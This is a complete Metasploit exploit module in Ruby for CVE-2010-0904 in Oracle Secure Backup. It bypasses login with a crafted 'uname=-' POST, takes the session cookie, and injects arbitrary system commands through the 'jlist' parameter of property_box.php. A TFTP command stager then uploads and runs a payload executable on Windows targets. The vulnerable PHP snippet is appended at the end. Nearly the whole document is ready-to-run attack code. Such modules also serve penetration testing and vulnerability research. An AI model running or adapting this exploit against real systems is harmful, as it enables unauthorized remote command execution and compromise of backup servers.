Oracle Secure Backup - Authentication Bypass/Command Injection (Metasploit)

##
# $Id: osb_uname_jlist.rb 13591 2011-08-19 18:35:29Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::CmdStagerTFTP
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
			'Description'    => %q{
					This module exploits an authentication bypass vulnerability
				in login.php. In conjuction with the authentication bypass issue,
				the 'jlist' parameter in property_box.php can be used to execute
				arbitrary system commands.
				This module was tested against Oracle Secure Backup version 10.3.0.1.0
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 13591 $',
			'References'     =>
				[
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ],
					[ 'CVE', '2010-0904' ],
					# the jlist vector has not been disclosed or has it?
				],
			'Targets'	=>
				[
					[ 'Windows Universal', 
						{ 
							'Arch' => ARCH_X86,
							'Platform' => 'win'
						} 
					]
				],
			'Privileged' => 'true',
			'Platform' => 'win',
			'DisclosureDate' => 'Jul 13 2010',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(443),
				OptBool.new('SSL',   [true, 'Use SSL', true]),
				OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
			], self.class)
	end

	def windows_stager

		exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
		
		print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
		execute_cmdstager({ :temp => '.'})
		@payload_exe = payload_exe
		
		print_status("Attempting to execute the payload...")
		execute_command(@payload_exe)
	
	end

	def execute_command(cmd, opts = {})

		res = send_request_cgi(
			{
				'uri'   =>  '/login.php',
				'data'  =>  'attempt=1&uname=-',
				'method' => 'POST',
			}, 5)

		if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i))
			sessionid = res.headers['Set-Cookie'].split(';')[0]

			data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd)
		
			send_request_raw(
				{
					'uri'   => '/property_box.php' + data,
					'cookie' => sessionid,
					'method' => 'GET',
				}, 5)

		else
			print_error("Invalid PHPSESSION token..")
			return
		end
	end

	def exploit

		if not datastore['CMD'].empty?
			print_status("Executing command '#{datastore['CMD']}'")
			execute_command(datastore['CMD'])
			return
		end

		case target['Platform']
			when 'win'
				windows_stager
			else
				raise RuntimeError, 'Target not supported.'
		end

		handler
	
	end
end
__END__
  else if (strcmp($type, "Job") == 0)
    {
    if (!is_array($objectname))
      $objectname = array();
    reset($objectname);
    while (list(,$oname) = each($objectname))
      {
      $oname = escapeshellarg($oname);
      $jlist = "$jlist $oname";
      }
    if (strlen($jlist) > 0)
      $msg = exec_qr("$rbtool lsjob -lrRLC $jlist");